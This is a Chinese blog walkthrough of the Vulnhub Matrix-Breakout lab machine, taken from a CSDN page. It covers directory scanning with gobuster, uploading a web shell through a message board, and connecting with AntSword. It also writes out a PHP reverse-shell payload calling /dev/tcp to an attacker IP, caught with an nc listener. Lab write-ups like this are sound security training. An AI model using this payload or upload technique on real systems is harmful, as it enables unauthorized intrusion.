vulhub Matrix-Breakout

ksk852

已于 2025-03-19 17:30:32 修改

阅读量506

点赞数 11

CC 4.0 BY-SA版权

文章标签： linux 运维服务器

于 2025-03-19 17:29:36 首次发布

本文链接：https://blog.youkuaiyun.com/2401_85578339/article/details/146374330

1.下载靶机，打开靶机和kali虚拟机

2.查询kali和靶机ip

3.浏览器访问

访问81端口有登陆界面

4.扫描敏感目录

kali dirb 扫描

一一访问

robot.txt提示我们继续找找，可能是因为我们的字典太小了，我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。

gobuster dir -u http://192.168.126.175 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

5.一一访问，发现留言板功能

6.漏洞挖掘

在其中进行上传抓包查看

发现上传到了graffiti.txt内，尝试上传一句话木马

7.获取webshell

蚁剑连接

8.上传反弹shell的php文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.126.130/6666 0>&1'");?>

浏览器访问shell.php

kali nc监听

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ksk852

关注关注

11
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulhub靶场-matrix-breakout-2-morpheus

mashiro_hibiki的博客

03-11

445

根据提示，在 cypher-neo.png 中存在flag，但是下载图片后并没有发现什么有用的信息，查看图片的时候需要把图片前面的.去掉才能在文件夹中看到图片。这里的话需要注意，提权的话，我们需要有一个bash终端才能在提权后成功获取到root权限的bash，所以我们先用php来获取一个bash。发现开放的端口服务，可以通过爆破ssh弱口令的形式来直接获取服务器权限，但一般ssh的口令都不太好爆破，访问开放的http服务。下载完成后，在vmware中打开，选择刚刚下载的ova文件。

Vulnhub中的Matrix-breakout2-Morpheus

在Web和Reverse坑里游泳中。。。。

01-20

929

又是收获满满的一周！

参与评论您还未登录，请先登录后发表或查看评论

【vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS

信安是不可或缺的一部分！

06-05

1728

这是《黑客帝国》系列的第二部，副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity，试图调查尼布甲尼撒号上的一台电脑，Cypher把其他人都锁在了电脑之外，这台电脑拥有解开谜团的钥匙。使用apache漏洞利用：（失败）在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为：192.168.200.0/24。靶机地址：192.168.200.134。192.168.200.1为物理机地址。

vulhub靶场matrix-breakout-2-morpheus通关攻略

qq_62486841的博客

03-19

332

主机ip为192.168.93.178。扫到22,80,81三个端口。

vulnhub靶场之Matrix-Breakout 2 Morpheus

qq_58091216的博客

01-31

1876

我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag，图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的，可能会有隐藏文件，此处简单一点直接在反弹shell双管齐下（一句话魔改一下）（记得要弄url编码）（干掉问号和空格和&）此处有一个file变量，那么改变file变量可以直接对靶机文件修改，能随意创建文件,二话不说写个马，准备反弹shell。截止到目前，我们没有找到任何有用的信息，我们可以换一个思路进行。

【Vulnhub靶场】Breakout

Nailaoyyds的博客

06-17

1071

目录前言一、信息收集0x00 arp-scan扫描0x01 nmap扫描0x02 dirsearch扫描二、漏洞利用0x01 webmin 远程代码漏洞0x02 Brainfuck0x03 enum4linux0x04 反弹shell0x05 搜集信息三、提权0x00 tar利用总结 arp-scan -I eth1 -l https://192.168.56.101:10000 https://192.168.56.101:20000 二者页面一致正常页面未发现webmin源码内

vulhub Matrix-Breakout: 2 Morpheus 超详细

m0_73391639的博客

08-03

2096

本文主要详细讲解vulhub Matrix-Breakout: 2 Morpheus靶场的打靶过程

vulnhub靶场1：matrix-breakout-2-morpheus

Genarior的专栏

02-22

816

vulnhub - matrix-breakout-2-morpheus靶场记录

vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS

qq_55349490的博客

05-29

344

【代码】vulhub靶场 MATRIX-BREAKOUT: 2 MORPHEUS。

vulnhub靶场Matrix-Breakout 2 Morpheus教程

m0_73248913的博客

01-22

6055

蚁剑的文件不是完整的，可能会有隐藏文件，此处简单一点直接在反弹shell双管齐下（一句话魔改一下）（记得要弄url编码）（干掉问号和空格和&）系统是Linux4.x|5.x看看有没有漏洞能利用，直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量，那么改变file变量可以直接对靶机文件修改，升值能随意创建文件。下载下去直接传上去跑就行（蚁剑直接传上去就可以了）（或者使用shell直接吓到靶机里）去到我进来写的shell看到一个图片看看，直接访问，毕竟没有扫出来。

2024年网安最全【网络安全】Vulnhub靶场之matrix-breakout-2-morpheus

2401_84265972的博客

05-01

935

Python编程学习，学习内容包含：语法、正则、文件、网络、多线程等常用库，推荐《Python核心编程》，不要看完；在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。恭喜你，如果学到这里，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web 渗透、安全服务、安全分析等岗位；③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察。

2401_84281720的博客

05-03

880

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

Vulnhub matrix-breakout-2-morpheus靶场攻击实战(二)

初学者

01-17

835

到这里，我们这个靶机就渗透测试成功了，当然有兴趣的读者可以研究下，其他的漏洞的利用看看能不能成功。记得给虚拟机打快照，防止搞崩虚拟机。

linux-系统日志查看指令systemctl

guchuanhang的专栏

08-05

332

本文介绍了Linux系统管理中的三个重要工具：systemctl用于管理系统服务，包括启动/停止服务和设置开机自启；journalctl用于查看systemd日志，支持按服务筛选和实时跟踪；以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异，提供了常用命令参考和实用技巧，如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。

14.Linux ： nfs与autofs的使用

最新发布

xie52的博客

08-05

415

【代码】14.Linux ： nfs与autofs的使用。

Linux 设备驱动程序（3）- 字符驱动（1）

qq_49477505的博客

08-02

1345

本文介绍了Linux字符设备驱动的开发流程，重点讲解了设备编号管理、核心数据结构及注册方法。字符设备驱动用于管理以字节流方式读写的设备，如串口、键盘等。开发时需处理主次设备号分配、file_operations结构定义、file/inode结构使用等关键环节。文章详细说明了静态/动态分配设备号的方法，以及通过cdev结构注册驱动的步骤（初始化、添加、创建节点等）。最后强调驱动卸载时要反向释放资源，包括删除设备文件、注销cdev结构等。整个流程体现了字符设备驱动如何在内核中建立设备编号与操作方法的关联机制。

Linux-进程优先级

m0_73936730的博客

08-04

706

简单的说优先级和权限的区别：老规矩：先写个简单的进程代码：进程优先级的修正数据，nice 值，nice其取值范围是-20至19，一共40个级别。新的优先级 = 优先级（默认80） + nice，这样，当nice值为负值的时候，那么该程序将会优先级值将变小，即其优先级会变高，则其越快被执行，所以调整进程优先级，在Linux下，就是调整进程nice值。再次修改nice值会失败，进程优先级不能经常修改我们语法格式：示例：语法格式：示例：

linux2.6 和 unix-v6 源码实验

is0815的博客

08-03

1031

你可以通过实现 Linux 2.6.x 的源码级图形调试，能看到源码、变量、寄存器，非常适合研究内核启动过程。同理，可以编译 unix-v6 (https://github.com/mit-pdos/xv6-public.git)以下是使用xv6‑public（xv6 的 x86 版本）在 Ubuntu/Linux 上安装、编译、运行、调试的详细中文指南。如果你想使用 RISC‑V 版本（xv6‑riscv），后续内容里也有说明。面向 Intel x86 架构，使用 ELF 格式。

Linux9 root密码修改

xy021111的博客

08-01

268

在linux行即quiet后面输入rd.break ctrl+x进入内核。

对Matrix-Breakout-2-Morpheus靶机进行渗透测试

12-13

对Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段，评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法： ### 1. ...